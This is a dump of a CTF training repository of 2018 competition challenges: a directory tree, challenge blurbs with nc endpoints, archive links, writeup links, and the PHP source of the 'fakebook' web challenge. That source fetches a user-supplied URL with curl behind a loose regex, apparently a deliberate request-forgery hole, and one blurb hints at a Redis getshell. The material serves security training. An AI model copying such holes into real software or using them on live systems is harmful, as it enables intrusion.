├── 2018
    ├── 2018网鼎杯第1场
    │   ├── Crypto
    │   │   ├── Calatan.txt
    │   │   ├── hashcoll.txt
    │   │   ├── hashcoll_ac8bf5298f038033f34f4a3548ae7c99.zip
    │   │   ├── permgame.txt
    │   │   └── permgame_ff6c9a03aff6cef8da3f8a897a42a568.zip
    │   ├── Misc
    │   │   ├── clip.txt
    │   │   ├── clip_66ebb848ff3221cd09ff6006972f9a73.zip
    │   │   ├── minified.txt
    │   │   └── minified_8f082e0d5cf036d5c7ec59fc8ac43277.zip
    │   ├── Pwn
    │   │   ├── EasyCoin_411ab658cb36bff0729ea2550bb307ab.zip
    │   │   ├── GUESS_3761eaaa3eb6e09db4eecc56b64f32e3.zip
    │   │   ├── babyheap_50dc3a21597ea49ed06895a2bcc77684.zip
    │   │   ├── blind_29709f4cd016a571bab0b14d281aad34.zip
    │   │   ├── hangman_b87931a68ab7ad7e89e3f1b47c9f4ddd.zip
    │   │   ├── heylow2_9d682804b9e5a2d11ac19570c8ae4734.zip
    │   │   └── heylow_1573001b4fc08c2f992305af9df85f2e.zip
    │   ├── README.md
    │   ├── Re
    │   │   ├── advanced_6e69f40eab9e0168910ab6b01d5fbaf4.zip
    │   │   ├── beijing_78e2c612b136ce520e313e96a7714665.zip
    │   │   └── blend_8a9243fa17bdccd501ba9b07c0d751b1.zip
    │   └── Web
    │   │   ├── fakebook.txt
    │   │   ├── fakebook.zip
    │   │   ├── spider.txt
    │   │   └── user.php
    ├── 2018网鼎杯第2场
    │   ├── Crypto
    │   │   ├── babyrsa_89298c8cb9ffbe7f16529bb5ed04a6b2.zip
    │   │   └── 二叉树_13f88763b875e66bfae94c4f42731f18.zip
    │   ├── Misc
    │   │   ├── Bill.txt
    │   │   ├── 套娃_a43704991961722c9c434e231cb2b28b.zip
    │   │   └── 虚幻_327935460744b341dd9f3f04819411e4.zip
    │   ├── Pwn
    │   │   ├── Fgo_28546b2f3331882a170b674edca6e90a.zip
    │   │   ├── easyFMT_21c6ffc902dca96d4ddcd558dcaa3153.zip
    │   │   ├── hvm_9d671d15efb43cd3909628e92b8f69c4.zip
    │   │   └── memffle_67804a75bcf59325a5c8d5dc60431f0f.zip
    │   ├── README.md
    │   ├── Re
    │   │   ├── RUA!_142924f1ec3c9ebe751c9452bcd2086b.zip
    │   │   ├── game_6d258173d802bcc79f3d7f68ad59df2a.zip
    │   │   ├── give_a_try_f0be695eb8ad4478e793e6a488303a10.zip
    │   │   └── martricks_6b64ac3e3a3e48a93eeadfca0f70aeb1.zip
    │   └── Web
    │   │   └── wafUpload.zip
    ├── 2018网鼎杯第3场
    │   ├── Crypto
    │   │   ├── Not_only_base_92b8361311cc8b4aa937aafc75ac1b3d.zip
    │   │   ├── hafuhafu_499dfea665100a3a0d9fc00c641dccc6.zip
    │   │   └── track_hacker_a187a5426e14528bb03447ed1cff1bac.zip
    │   ├── Misc
    │   │   ├── Unpleasant_music_f70bde32f810e516430ef87b34e7cb58.zip
    │   │   ├── dewas_183a396cf9e027818694af487d562f82.zip
    │   │   └── mirror_9071944e448951316e8a5e90997d2397.zip
    │   ├── Pwn
    │   │   ├── note2_e5c1fd9f2122f743c9e07615e4e0d86b.zip
    │   │   ├── note_7577feb869f21800282474553eb5a578.zip
    │   │   ├── pesp_304ba4d803e7c5367dce051409a80394.zip
    │   │   └── soEasy_d8e9ec3653f60c1993d4c2f0cfe324e2.zip
    │   ├── README.md
    │   ├── Re
    │   │   ├── I_like_pack_aa64e41f373819568e4ceeff58b8eb20.zip
    │   │   ├── babyre_bee79960d84e07f9e8c47d35e5b79fed.zip
    │   │   ├── simpleSMC_34a6f5718d14a7537ec1dd00fa0f832d.zip
    │   │   └── 最好的语言_87b0f5f08d1bfc5681c580e3670f8601.zip
    │   └── 网鼎杯writeup-护网先锋.pdf
    ├── 2018网鼎杯第4场
    │   ├── Crypto
    │   │   ├── apl_757b57aab7fdc7a2cf0808836cb1ec39.zip
    │   │   ├── number_d274d3c43a1b6ab7875f4c06542d3d3a.zip
    │   │   ├── shanghai_09dbaf0a4a83b7ebfd08ae0fe85d9d05.zip
    │   │   ├── shellcoder_586854eb4f0df7001ce33e762af50643.zip
    │   │   ├── shenyue2_f5da6843ba2862246210199bf8c584e7.zip
    │   │   └── shenyue_8a90cab30c96e7e827e3585c2be1ed8a.zip
    │   ├── Misc
    │   │   ├── welcome.txt
    │   │   ├── welcome_3d8b520a2dc416e182d8592e9a1aaa76.zip
    │   │   ├── xiaojiejie.txt
    │   │   ├── xiaojiejie_c617168167b7c041bc98d683597594bb.zip
    │   │   └── 双色块_99268fd14c1e51d3ef11a90c2943a2c5.zip
    │   ├── Pwn
    │   │   ├── impossible_1d1a9f4b730de9a44fd865843fa737f3.zip
    │   │   ├── ipowtn_e912ff8757c402c8afcc362148836c6c.zip
    │   │   └── ipowtn_reborn_caebf086efc862a3141e6c696ef499a8.zip
    │   ├── README.md
    │   ├── Re
    │   │   ├── chaoyang_8eb13126e21561d48dc209a9c88dfc43.zip
    │   │   ├── compenc_58b462e2a4449a6bd5c10913931c9b58.zip
    │   │   └── dalao_90f768a442eb708749585188c3995cc0.zip
    │   └── Web
    │   │   ├── NoWafUpload.zip
    │   │   └── comment.php.zip
    ├── 2018网鼎杯线下赛
    │   ├── AWD.zip
    │   └── README.md
    ├── BesideTLV
    │   ├── BesideTLV.docm
    │   └── README.md
    ├── ISC-2018-蓝鲸魔塔线上赛
    │   ├── Crypto
    │   │   ├── Brsa.zip
    │   │   ├── SRSA.zip
    │   │   ├── Up-Add.zip
    │   │   ├── rsaboy.zip
    │   │   └── 题目.md
    │   ├── Misc
    │   │   ├── PlainZIP.zip
    │   │   ├── Transparentbrain.zip
    │   │   ├── WaveSong.zip
    │   │   ├── 彩虹糖.zip
    │   │   └── 题目.md
    │   ├── Pwn
    │   │   ├── BOF.zip
    │   │   ├── babyFMT.zip
    │   │   ├── babyPWN.zip
    │   │   ├── data_POL.zip
    │   │   └── 题目.md
    │   ├── README.md
    │   ├── Reverse
    │   │   ├── PYMD5.zip
    │   │   ├── XTEAPY.zip
    │   │   ├── crc.zip
    │   │   ├── 背叛天主.zip
    │   │   └── 题目.md
    │   └── Web
    │   │   ├── 蓝鲸文件管理系统.zip
    │   │   ├── 蓝鲸日记系统.zip
    │   │   ├── 蓝鲸笔记管理系统.zip
    │   │   └── 题目.md
    ├── ISG-2018 观安杯安全运维管理赛
    │   └── README.md
    ├── LCTF2018
    │   ├── LCTF2018.zip
    │   └── README.md
    ├── TokyoWesterns-CTF-4th-2018
    │   ├── Crypto
    │   │   ├── mixed-cipher.zip
    │   │   ├── revolutional-secure-angou-de97106aa248a41a40fdd001fc5f7b4b4f28a39eb6bcabf8401b108b7a8961c5.7z
    │   │   └── scs7.zip
    │   ├── Misc
    │   │   ├── mondai-77791222cdec2fe04bc20eafdb3b330c284d59e35046811c84b47d074e068906.zip
    │   │   ├── pysandbox.zip
    │   │   └── vimshell.zip
    │   ├── Pwn
    │   │   ├── BBQ-2c107bf28df3aabb5dbb245fa37ed8887dd6c96b3c42cf1756976ba0b77b9a63.zip
    │   │   ├── BBQ-old.zip
    │   │   ├── EscapeMe-714f81602f833da6497283263e46ca7918cbc91ba89b0ab4d84460b801a4ed97.tar.gz
    │   │   ├── EscapeMe.txt
    │   │   ├── RKM-f8565f7b4f0e3bf5f2997d65edc5ea76356a2433e74c2251777cda97e692d138.zip
    │   │   ├── load-ef05273401f331748cca5fcb8b14c43f80600adf4266fee4e5f250730b503f0c.zip
    │   │   ├── neighbor_c-310f2ca86ab0025591c201502ccb4bc3a13b30350b106e693cf483fbdb2b76b1.zip
    │   │   ├── swap_returns-b53223ca8f38cb4615ba13aa2671431bdd8fbb84b033b8c87327e5bd17aaeab6.zip
    │   │   └── twgc-18e0a86aae9b32113cd3089cc1574a897bc258553a9959dc734783228e4ce5a0.zip
    │   ├── README.md
    │   ├── Reverse
    │   │   ├── DartS-97a8961947219a9880a86c19d83afc4e2212532f1a6822fd63320887e2485b38.7z
    │   │   ├── MatrixLED-7e8889a79686d431e9a7f0210938bfc342399970bc045ecd19a988bffc5477a7.7z
    │   │   ├── MatrixLED.txt
    │   │   ├── REVersiNG-506b37abc07f52d16ac8342b57b36932b8bf1be42b5b5cdb12ec656448ac668f.7z
    │   │   ├── REVersiNG.txt
    │   │   ├── dec_dec_dec-c55c231bfbf686ab058bac2a56ce6cc49ae32fe086af499571e335c9f7417e5b.zip
    │   │   └── tw_playing_card-cf4512000e5797d94e1d98c3af040bd87523081c1ab3f58dea3b70047b634c9f.zip
    │   └── Web
    │   │   ├── Shrine.zip
    │   │   ├── SimpleAuth.zip
    │   │   └── Slack emoji converter.zip
    ├── XJNUCTF
    │   ├── README.md
    │   ├── XJNUwp.pdf
    │   ├── baby.zip
    │   ├── misc15.zip
    │   ├── misc20.zip
    │   ├── misc30.zip
    │   ├── misc40.zip
    │   ├── misc50.zip
    │   ├── misc80.zip
    │   └── 题目.docx
    ├── hctf
    │   ├── Blockchain
    │   │   ├── ReEthereum from zero
    │   │   │   └── desc.txt
    │   │   ├── bet2loss
    │   │   │   └── desc.txt
    │   │   └── ez2win
    │   │   │   └── desc.txt
    │   ├── README.md
    │   ├── Rev
    │   │   ├── LuckyStar☆
    │   │   │   ├── LuckyStar.exe
    │   │   │   └── desc.txt
    │   │   ├── PolishDuck
    │   │   │   ├── PolishDuck.hex
    │   │   │   └── desc.txt
    │   │   ├── [Rev] seven
    │   │   │   ├── desc.txt
    │   │   │   └── seven.sys
    │   │   └── [Rev] spiral
    │   │   │   ├── Spiral.exe
    │   │   │   └── desc.txt
    │   ├── crypto
    │   │   ├── xor game
    │   │   │   ├── desc.txt
    │   │   │   └── xor_game.zip
    │   │   └── xorrsa
    │   │   │   ├── challenge.py
    │   │   │   ├── desc.txt
    │   │   │   └── rsa.py
    │   ├── misc
    │   │   ├── Guess My Key
    │   │   │   └── desc.txt
    │   │   ├── Questionnaire
    │   │   │   ├── desc.txt
    │   │   │   └── flag.pdf
    │   │   ├── difficult programming language
    │   │   │   ├── desc.txt
    │   │   │   └── difficult_programming_language.zip
    │   │   ├── eazy dump
    │   │   │   └── desc.txt
    │   │   └── freq game
    │   │   │   └── desc.txt
    │   └── pwn
    │   │   ├── [Pwn] the end
    │   │       ├── desc.txt
    │   │       └── the_end_890eb79d67925bd059ffb9ba60697f4d19cc2bbd923f474b2a84daaa22e59068.zip
    │   │   ├── baby printf ver2
    │   │       ├── babyprintf_ver2_99aaef89552b3713c7dc756f96475b9bdd6c6558f5ba44572bde923f33a30f23.zip
    │   │       └── desc.txt
    │   │   ├── christmas
    │   │       ├── christmas_cb187339cda7c78f10f6c892214b37e9330e3d504a09fb2de34b3d94b18f69aa.zip
    │   │       └── desc.txt
    │   │   ├── easyexp
    │   │       ├── desc.txt
    │   │       └── easyexp_06bd96b5f874f02d6564c2583818f2fe207e8e57d1fcc0a9729cfff288af82df.zip
    │   │   └── heapstorm zero
    │   │       ├── desc.txt
    │   │       └── heapstorm_zero_1f967ddec00ba70bf22411c53c663d5f859d8af3dcdb8f1ed21f2e25d78b239e.zip
    ├── swpuctf
    │   ├── README.md
    │   ├── bin
    │   │   ├── bin.png
    │   │   └── exploit_1
    │   │   │   ├── exploit_1
    │   │   │   └── libc.so.6
    │   ├── misc
    │   │   ├── Easy.zip
    │   │   ├── flag.txt
    │   │   ├── hello.pcapng
    │   │   └── misc.png
    │   ├── mobile
    │   │   ├── app-debug1.apk
    │   │   ├── app-debug2.apk
    │   │   └── mobie.png
    │   ├── reverse
    │   │   ├── re1
    │   │   │   └── CM1.exe
    │   │   ├── re2
    │   │   │   └── CM2.exe
    │   │   ├── re4
    │   │   │   └── CM3.exe
    │   │   └── reverse.png
    │   ├── web
    │   │   ├── web.png
    │   │   └── www.zip
    │   └── writeup
    │   │   ├── assets
    │   │       ├── miscwp-0191e320.png
    │   │       ├── miscwp-82fc9b95.png
    │   │       ├── miscwp-b1176f6a.png
    │   │       ├── miscwp-c1a41fa4.png
    │   │       ├── webwp-14aa208b.png
    │   │       ├── webwp-1f42159a.png
    │   │       ├── webwp-24b1d07d.png
    │   │       ├── webwp-32e6e4be.png
    │   │       ├── webwp-36b393dc.png
    │   │       ├── webwp-3f1f76c0.png
    │   │       ├── webwp-3fff575c.png
    │   │       ├── webwp-5443d107.png
    │   │       ├── webwp-5eb078e4.png
    │   │       ├── webwp-5fc2bade.png
    │   │       ├── webwp-62e01155.png
    │   │       ├── webwp-6e86a328.png
    │   │       ├── webwp-74eab9af.png
    │   │       ├── webwp-7e521145.png
    │   │       ├── webwp-807d3a06.png
    │   │       ├── webwp-82d31b8a.png
    │   │       ├── webwp-971cb144.png
    │   │       ├── webwp-999d3929.png
    │   │       ├── webwp-a5447514.png
    │   │       ├── webwp-b1ad87e0.png
    │   │       ├── webwp-b723271d.png
    │   │       ├── webwp-bc510790.png
    │   │       ├── webwp-c2e27f84.png
    │   │       ├── webwp-e8c71ac5.png
    │   │       ├── webwp-e8e9f208.png
    │   │       ├── webwp-ee1e6186.png
    │   │       ├── webwp-ef91f632.png
    │   │       ├── webwp-f89cee69.png
    │   │       └── webwp-ff3f7dad.png
    │   │   ├── miscwp.md
    │   │   ├── pwnwp.md
    │   │   └── webwp.md
    ├── 安恒9月赛
    │   ├── README.md
    │   ├── cpypto
    │   │   ├── Go（提交你找到的字符串的md5值）
    │   │   │   └── 5ba3589b6fd54.zip
    │   │   └── 简单加密
    │   │   │   └── 5ba3589b5a9bb.zip
    │   ├── misc
    │   │   ├── Ditf（flag中的字符串md5后提交）
    │   │   │   └── 5ba358a2402eb.png
    │   │   └── crc
    │   │   │   └── 5ba358a26ec24.zip
    │   ├── pwn
    │   │   └── vm
    │   │   │   └── 5ba358a3c50d7
    │   ├── reverse
    │   │   ├── GodDriver
    │   │   │   └── 5ba358a45bd15
    │   │   └── NewDriver
    │   │   │   └── 5ba358a4689c8.exe
    │   └── web
    │   │   ├── babybypass
    │   │       └── index.php
    │   │   └── 神奇的CMS
    │   │       ├── You_Cant_Guess.zip
    │   │       └── 新建文本文档.txt
    ├── 护网杯
    │   ├── MISC
    │   │   └── 迟来的签到题
    │   │   │   └── task_5.txt
    │   ├── REVERSE
    │   │   ├── APM233
    │   │   │   ├── dict.pcapng
    │   │   │   └── huwang.cap
    │   │   ├── RERERE
    │   │   │   └── task_huwang-refinal-4.exe
    │   │   └── fake-proc
    │   │   │   └── task_Loader5.exe
    │   ├── crypto
    │   │   ├── HuwangMailBox
    │   │   │   └── task_huwang_mailbox.sol
    │   │   ├── fez
    │   │   │   └── 5
    │   │   │   │   ├── fez.log
    │   │   │   │   └── fez.py
    │   │   └── wpa2
    │   │   │   └── task_WPA2.py
    │   ├── pwn
    │   │   ├── calendar
    │   │   │   └── task_calendar
    │   │   ├── gettingStart
    │   │   │   ├── payload
    │   │   │   └── task_gettingStart_ktQeERc (2)
    │   │   ├── huwang
    │   │   │   └── task_attachment.zip
    │   │   ├── shoppingcart
    │   │   │   ├── exp-pwn.py
    │   │   │   └── task_shoppingCart
    │   │   └── six
    │   │   │   └── task_attachments_csyNf1R.zip
    │   └── 红日安全-wp.pdf
    ├── 湖湘杯2018
    │   ├── Crypto
    │   │   └── Common Crypto
    │   │   │   ├── crypto_6CB66A304EB02150BC1747693B252A66.zip
    │   │   │   └── desc.txt
    │   ├── README.md
    │   ├── Reverse
    │   │   ├── HighwayHash64
    │   │   │   ├── desc.txt
    │   │   │   └── reverse_4FB03B4915A8D64AF9F4AD20FAD54398.zip
    │   │   ├── More efficient than JS
    │   │   │   ├── attach_9550FD3DD9774159E9955E2A0E389842.zip
    │   │   │   └── desc.txt
    │   │   └── Replace
    │   │   │   ├── Replace_B21DA8B2F172C13764989DF0F99B890A.rar
    │   │   │   └── desc.txt
    │   ├── misc
    │   │   ├── Disk
    │   │   │   ├── desc.txt
    │   │   │   └── disk_95ED58BC6E172FABFEE602D4513E2BE7.zip
    │   │   ├── Flow
    │   │   │   ├── desc.txt
    │   │   │   └── flow_6D1210D1307A67E4A428602F722E6803.zip
    │   │   ├── Hidden Write
    │   │   │   ├── maomao1.png
    │   │   │   └── maomao_887FB92FA255BB64B6634626668ADE45.zip
    │   │   ├── ctf-flat.vmdk
    │   │   └── disk_95ED58BC6E172FABFEE602D4513E2BE7.zip
    │   ├── pwn
    │   │   ├── Hash Burger
    │   │   │   ├── desc.txt
    │   │   │   └── pwn_36E4F0B8449B31AC6BE4C70755AE801D.zip
    │   │   ├── Hello World
    │   │   │   └── desc.txt
    │   │   └── Regex Format
    │   │   │   ├── desc.txt
    │   │   │   └── pwn_1D0984F129D563BC739B37E975CC8DF2.zip
    │   └── web
    │   │   ├── Code Check
    │   │       └── list.zip
    │   │   ├── MyNote
    │   │       └── desc.txt
    │   │   └── Readflag
    │   │       └── desc.txt
    └── 百越杯2018
    │   ├── Crypto
    │       ├── RSA_aaef56c99a718d469dcad5fde68941c7.zip
    │       └── maishouji_fc5eaa869a43d358f8c0a036d859699f.zip
    │   ├── Misc
    │       ├── flag_universe_f3b2fac7edc9703224e1fcf53fced535.zip
    │       ├── manan_df7f4b63114124324c8a36a4b548e15f.zip
    │       ├── xuexiaoban_210565db66adf7671800807cd9593d06.zip
    │       └── 签到.png
    │   ├── Pwn
    │       ├── bgame_14f6a4f3ce6509b0f8c4bc9c7fdd8dca.zip
    │       └── format_130934106884542e1a64a457e3cc5833.zip
    │   ├── README.md
    │   ├── Reverse
    │       ├── Just Reverse It_10feadf0e84b220e4824fce1f176367d.zip
    │       ├── crazy_8113319c0b88651a1cda1352872e3be1.zip
    │       └── magic_879801ac7e1170fdba5eaf94291611d3.zip
    │   ├── Web
    │       ├── Download it.zip
    │       ├── Easy flask.zip
    │       ├── simple ser.zip
    │       └── warmup.zip
    │   ├── misc
    │       ├── flag_universe
    │       │   ├── flag_universe.pcapng
    │       │   ├── flag_universe_f3b2fac7edc9703224e1fcf53fced535.zip
    │       │   └── 题目信息.png
    │       ├── 签到
    │       │   ├── shudu.png
    │       │   └── 题目信息.png
    │       ├── 血小板天下第一可爱
    │       │   ├── xuexiaoban_210565db66adf7671800807cd9593d06.zip
    │       │   ├── 血小板天下第一可爱
    │       │   │   ├── 1.png
    │       │   │   └── key.png
    │       │   └── 题目信息.png
    │       └── 马克
    │       │   ├── atool.png
    │       │   ├── manan_df7f4b63114124324c8a36a4b548e15f.zip
    │       │   └── 题目信息.png
    │   └── pwn
    │       ├── Boring game
    │           ├── bgame_14f6a4f3ce6509b0f8c4bc9c7fdd8dca.zip
    │           └── 题目信息.png
    │       └── format
    │           ├── format_130934106884542e1a64a457e3cc5833.zip
    │           └── 题目信息.png
└── README.md


/2018/2018网鼎杯第1场/Crypto/Calatan.txt:
--------------------------------------------------------------------------------
1 | We have developed a new cryptosystem, named Calatan, find the flag!
2 | nc 106.75.31.181 9999
3 | 


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Crypto/hashcoll.txt:
--------------------------------------------------------------------------------
1 | Sometime, you wonder why you rEad the DescrIption Because it may contaIn something useless.
2 | nc 117.50.1.201 9999
3 | 


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Crypto/hashcoll_ac8bf5298f038033f34f4a3548ae7c99.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第1场/Crypto/hashcoll_ac8bf5298f038033f34f4a3548ae7c99.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Crypto/permgame.txt:
--------------------------------------------------------------------------------
1 | If something wrong happens to you, never forget to breath. - Ultra spirit tips
2 | nc 106.75.27.175 9999
3 | 


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Crypto/permgame_ff6c9a03aff6cef8da3f8a897a42a568.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第1场/Crypto/permgame_ff6c9a03aff6cef8da3f8a897a42a568.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Misc/clip.txt:
--------------------------------------------------------------------------------
1 | A strange filesystem is recovered from a damaged old hard disk.
2 | 


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Misc/clip_66ebb848ff3221cd09ff6006972f9a73.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第1场/Misc/clip_66ebb848ff3221cd09ff6006972f9a73.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Misc/minified.txt:
--------------------------------------------------------------------------------
1 | A strange pic.
2 | 


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Misc/minified_8f082e0d5cf036d5c7ec59fc8ac43277.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第1场/Misc/minified_8f082e0d5cf036d5c7ec59fc8ac43277.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Pwn/EasyCoin_411ab658cb36bff0729ea2550bb307ab.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第1场/Pwn/EasyCoin_411ab658cb36bff0729ea2550bb307ab.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Pwn/GUESS_3761eaaa3eb6e09db4eecc56b64f32e3.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第1场/Pwn/GUESS_3761eaaa3eb6e09db4eecc56b64f32e3.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Pwn/babyheap_50dc3a21597ea49ed06895a2bcc77684.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第1场/Pwn/babyheap_50dc3a21597ea49ed06895a2bcc77684.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Pwn/blind_29709f4cd016a571bab0b14d281aad34.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第1场/Pwn/blind_29709f4cd016a571bab0b14d281aad34.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Pwn/hangman_b87931a68ab7ad7e89e3f1b47c9f4ddd.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第1场/Pwn/hangman_b87931a68ab7ad7e89e3f1b47c9f4ddd.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Pwn/heylow2_9d682804b9e5a2d11ac19570c8ae4734.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第1场/Pwn/heylow2_9d682804b9e5a2d11ac19570c8ae4734.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Pwn/heylow_1573001b4fc08c2f992305af9df85f2e.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第1场/Pwn/heylow_1573001b4fc08c2f992305af9df85f2e.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/README.md:
--------------------------------------------------------------------------------
1 | ### Writeup
2 | 
3 | - [【2018年 网鼎杯CTF 第一场】Web 题解](https://xz.aliyun.com/t/2607) 
4 | - [【2018年 网鼎杯CTF 第一场】教育组 WP — Lilac](https://xz.aliyun.com/t/2608) 
5 | - [【2018年 网鼎杯CTF 第一场】 教育组 Pwn Babyheap 题解](https://xz.aliyun.com/t/2609) 
6 | - [【2018年 网鼎杯CTF 第一场】China H.L.B “网鼎杯” 部分WriteUp](https://xz.aliyun.com/t/2611) 
7 | - [[原创]网鼎杯第一场预选 babyheap](https://bbs.pediy.com/thread-246391.htm) 
8 | - [2018网鼎杯部分WriteUp](https://cyto.top/2018/08/21/writeup-2018wangdingbei/) 
9 | - [WriteUp: 网鼎杯教育组](https://ihomura.cn/2018/08/23/WriteUp-%E7%BD%91%E9%BC%8E%E6%9D%AF%E6%95%99%E8%82%B2%E7%BB%84/) 


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Re/advanced_6e69f40eab9e0168910ab6b01d5fbaf4.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第1场/Re/advanced_6e69f40eab9e0168910ab6b01d5fbaf4.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Re/beijing_78e2c612b136ce520e313e96a7714665.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第1场/Re/beijing_78e2c612b136ce520e313e96a7714665.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Re/blend_8a9243fa17bdccd501ba9b07c0d751b1.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第1场/Re/blend_8a9243fa17bdccd501ba9b07c0d751b1.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Web/fakebook.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第1场/Web/fakebook.txt


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Web/fakebook.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第1场/Web/fakebook.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Web/spider.txt:
--------------------------------------------------------------------------------
1 | spider
2 | 分值：1000分 未解答   
3 | find the flag.
4 | 
5 | 动态爬虫，Redis Getshell。
6 | 8000端口存在apache2
7 | 


--------------------------------------------------------------------------------
/2018/2018网鼎杯第1场/Web/user.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | 
 4 | class UserInfo
 5 | {
 6 |     public $name = "";
 7 |     public $age = 0;
 8 |     public $blog = "";
 9 | 
10 |     public function __construct($name, $age, $blog)
11 |     {
12 |         $this->name = $name;
13 |         $this->age = (int)$age;
14 |         $this->blog = $blog;
15 |     }
16 | 
17 |     function get($url)
18 |     {
19 |         $ch = curl_init();
20 | 
21 |         curl_setopt($ch, CURLOPT_URL, $url);
22 |         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
23 |         $output = curl_exec($ch);
24 |         $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
25 |         if($httpCode == 404) {
26 |             return 404;
27 |         }
28 |         curl_close($ch);
29 | 
30 |         return $output;
31 |     }
32 | 
33 |     public function getBlogContents ()
34 |     {
35 |         return $this->get($this->blog);
36 |     }
37 | 
38 |     public function isValidBlog ()
39 |     {
40 |         $blog = $this->blog;
41 |         return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
42 |     }
43 | 
44 | }


--------------------------------------------------------------------------------
/2018/2018网鼎杯第2场/Crypto/babyrsa_89298c8cb9ffbe7f16529bb5ed04a6b2.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第2场/Crypto/babyrsa_89298c8cb9ffbe7f16529bb5ed04a6b2.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第2场/Crypto/二叉树_13f88763b875e66bfae94c4f42731f18.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第2场/Crypto/二叉树_13f88763b875e66bfae94c4f42731f18.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第2场/Misc/Bill.txt:
--------------------------------------------------------------------------------
1 | Bill? No! I'm Beale!
2 | 
3 | 106.75.13.204


--------------------------------------------------------------------------------
/2018/2018网鼎杯第2场/Misc/套娃_a43704991961722c9c434e231cb2b28b.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第2场/Misc/套娃_a43704991961722c9c434e231cb2b28b.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第2场/Misc/虚幻_327935460744b341dd9f3f04819411e4.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hongriSec/CTF-Training/4b5634ec2117ddbf9c1d90def96eac4780c0b0ef/2018/2018网鼎杯第2场/Misc/虚幻_327935460744b341dd9f3f04819411e4.zip


--------------------------------------------------------------------------------
/2018/2018网鼎杯第2场/Pwn/Fgo_28546b2f3331882a170b674edca6e90a.zip:
